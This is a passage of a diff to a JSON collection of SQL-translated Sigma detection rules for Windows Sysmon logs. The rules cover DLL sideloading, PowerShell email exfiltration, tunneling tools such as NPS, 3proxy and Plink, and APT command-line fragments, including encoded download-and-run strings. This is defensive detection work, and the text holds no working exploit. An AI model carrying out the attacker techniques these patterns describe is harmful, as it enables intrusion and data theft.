'\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": 
"test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet 
to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to 
sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + 
"description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Signing Bypass Via 
Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND 
CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", + "status": "test", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". 
One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - 
"attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may 
use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of 
SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", + "status": "test", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "Potential ACTINIUM Persistence Activity", + "id": 
"e1118a8f-82f5-44b3-bb6b-8a284e5df602", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "status": "experimental", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE 